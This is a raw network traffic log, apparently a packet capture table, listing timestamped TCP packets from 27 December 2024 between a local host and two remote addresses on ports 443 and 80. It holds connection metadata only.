                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088581085 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088609934 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088660002 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088674068 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088705063 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.088735104 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096204996 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096221924 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096287966 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096297979 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.096342087 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098262072 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098279953 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098387957 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098395109 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.098490000 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104846001 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104862928 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104935884 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104945898 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.104998112 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.107908964 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.107925892 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.108011007 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.108017921 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.108207941 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114741087 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114757061 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114829063 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114837885 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.114918947 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116309881 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116331100 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116389990 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116395950 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116424084 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.116445065 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124094009 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124113083 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124169111 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124178886 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124231100 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.124252081 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126574039 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126594067 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126682043 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126688004 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.126933098 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.133961916 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.133977890 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134061098 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134068966 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134156942 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134974957 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.134998083 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.135080099 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.135085106 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.135359049 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.143937111 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.143959999 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144031048 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144040108 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144208908 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144501925 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144521952 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144560099 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144563913 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144592047 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.144613028 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152571917 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152595043 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152648926 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152657032 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152704000 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.152724028 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.154153109 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.154176950 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.154218912 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.154223919 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.154248953 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.154270887 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.291244984 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.291341066 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.291352987 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.291445971 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.291944027 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.291996956 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.292002916 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.292062044 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.292476892 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.292495012 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.312087059 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.312105894 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.312185049 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.312196970 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.312237978 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.312522888 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.312539101 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.312598944 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.312604904 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.313244104 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.315063953 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.315079927 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.315165043 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.315170050 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.315213919 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.322324038 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.322340012 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.322423935 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.322429895 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.322468042 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.330732107 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.330749989 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.330862999 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.330872059 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.330909014 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.338511944 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.338531017 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.338606119 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.338615894 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.338846922 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.346843004 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.346868992 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.346946955 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.346955061 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.347007990 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.352708101 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.352750063 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.352797985 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.352803946 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.352813959 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.352840900 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.352868080 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.354032993 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.354048967 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597779989 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597811937 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597826004 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597894907 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597939968 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597953081 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597964048 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597976923 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597990036 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.598006010 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.598031998 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.598174095 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.598186970 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.598227024 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.717547894 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.717575073 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.717662096 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.789561033 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.789665937 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.789964914 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.793780088 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.793979883 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.794126987 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.802170992 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.802248001 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.802654028 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.810123920 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.810230017 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.810295105 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.818511009 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.818584919 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.819215059 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.826850891 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.826961994 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.827083111 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.835264921 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.835361004 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.835804939 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.843646049 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.843748093 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.844116926 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.852022886 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.852117062 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.856095076 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.860440969 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.860551119 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.863464117 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.868753910 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.868861914 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.868917942 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.909889936 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.960793018 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.981599092 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.981741905 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.984107018 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.985848904 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.985933065 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.988079071 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.994194031 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.994311094 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.996097088 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.002569914 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.002671957 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.004086018 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.007675886 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.007813931 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.008100986 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.012465954 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.012583017 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.015702963 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.017323971 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.017365932 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.019341946 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.022114992 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.022211075 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.024080038 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.026902914 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.027024984 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.028074980 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.031719923 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.031825066 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.032073021 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.036545038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.036592960 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.040086985 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.041348934 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.041599989 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.044106007 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.046179056 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.046282053 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.046334028 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.050967932 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.051094055 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.052078962 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.055779934 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.055898905 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.055985928 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.060595036 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.060734034 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.064078093 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.065392971 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.065536976 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.065592051 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.070207119 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.070319891 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.070631981 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.075018883 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.075115919 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.076083899 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.173687935 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.173799992 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.173888922 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.175906897 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.176002026 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.176057100 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.180320024 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.180413008 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.180460930 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.185693979 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.185708046 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.185755014 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.188986063 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.189063072 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.189106941 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.193185091 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.193294048 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.193336964 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.197315931 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.197433949 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.197484016 CET4977380192.168.2.65.252.155.64
